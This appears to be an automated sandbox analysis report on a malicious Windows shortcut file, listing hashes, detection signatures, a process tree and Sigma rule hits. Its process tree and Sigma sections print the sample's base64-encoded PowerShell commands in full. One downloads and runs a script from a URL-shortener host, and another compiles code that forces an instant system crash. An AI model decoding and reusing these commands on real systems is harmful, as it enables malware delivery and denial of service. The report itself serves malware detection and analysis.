Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Windows PowerShell.lnk

Overview

General Information

Sample name:Windows PowerShell.lnk
Analysis ID:1526392
MD5:02e1f1ea7dc301147433623d31e5a294
SHA1:b882f489808747b6201b113d306a42d533ca229e
SHA256:de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Performs an instant shutdown (NtRaiseHardError)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Compiles C# or VB.Net code
Connects to a URL shortener service
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5956 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5784 cmdline: cmd /c exit 97 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5672 cmdline: cmd /c exit 98 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 356 cmdline: cmd /c exit 99 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3816 cmdline: cmd /c exit 100 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1372 cmdline: cmd /c exit 101 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 796 cmdline: cmd /c exit 102 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5952 cmdline: cmd /c exit 103 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5716 cmdline: cmd /c exit 104 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5764 cmdline: cmd /c exit 105 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1008 cmdline: cmd /c exit 106 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 404 cmdline: cmd /c exit 107 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1668 cmdline: cmd /c exit 108 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4232 cmdline: cmd /c exit 109 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5812 cmdline: cmd /c exit 110 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 936 cmdline: cmd /c exit 111 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1364 cmdline: cmd /c exit 112 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4620 cmdline: cmd /c exit 113 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 616 cmdline: cmd /c exit 114 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1672 cmdline: cmd /c exit 115 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1016 cmdline: cmd /c exit 116 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2084 cmdline: cmd /c exit 117 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2324 cmdline: cmd /c exit 118 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3360 cmdline: cmd /c exit 119 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3004 cmdline: cmd /c exit 120 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5696 cmdline: cmd /c exit 121 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3820 cmdline: cmd /c exit 122 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3704 cmdline: cmd /c exit 65 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6568 cmdline: cmd /c exit 66 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7016 cmdline: cmd /c exit 67 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4328 cmdline: cmd /c exit 68 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 69 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2308 cmdline: cmd /c exit 70 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 672 cmdline: cmd /c exit 71 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5988 cmdline: cmd /c exit 72 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4232 cmdline: cmd /c exit 73 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5812 cmdline: cmd /c exit 74 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 936 cmdline: cmd /c exit 75 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1364 cmdline: cmd /c exit 76 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4620 cmdline: cmd /c exit 77 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 616 cmdline: cmd /c exit 78 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1512 cmdline: cmd /c exit 79 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1136 cmdline: cmd /c exit 80 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1924 cmdline: cmd /c exit 81 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5700 cmdline: cmd /c exit 82 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3360 cmdline: cmd /c exit 83 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3816 cmdline: cmd /c exit 84 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1372 cmdline: cmd /c exit 85 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6288 cmdline: cmd /c exit 86 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5716 cmdline: cmd /c exit 87 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2548 cmdline: cmd /c exit 88 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4328 cmdline: cmd /c exit 89 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 90 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2308 cmdline: cmd /c exit 48 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 672 cmdline: cmd /c exit 49 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6108 cmdline: cmd /c exit 50 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2924 cmdline: cmd /c exit 51 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3152 cmdline: cmd /c exit 52 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3748 cmdline: cmd /c exit 53 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4620 cmdline: cmd /c exit 54 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1016 cmdline: cmd /c exit 55 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2084 cmdline: cmd /c exit 56 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5676 cmdline: cmd /c exit 57 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5980 cmdline: cmd /c exit 123 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5672 cmdline: cmd /c exit 125 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3220 cmdline: cmd /c exit 63 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6068 cmdline: cmd /c exit 58 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 1088 cmdline: cmd /c exit 46 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5716 cmdline: cmd /c exit 61 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 2548 cmdline: cmd /c exit 44 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 4328 cmdline: cmd /c exit 95 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3160 cmdline: cmd /c exit 45 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6196 cmdline: powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUABhAHMAcwBUAGgAcgB1ACAALQBDAG8AbQBwAGkAbABlAHIAUABhAHIAYQBtAGUAdABlAHIAcwAgACQAYwA7AGkAZgAoACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBpAG4AIAAxACAALQBNAGEAeAAgADcAKQAgAC0AZQBxACAAMQApAHsAWwBYAF0AOgA6AFMAaABvAHQAKAApAH0AUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIA MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 5608 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 4620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcAAgAC0AUAB
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7AC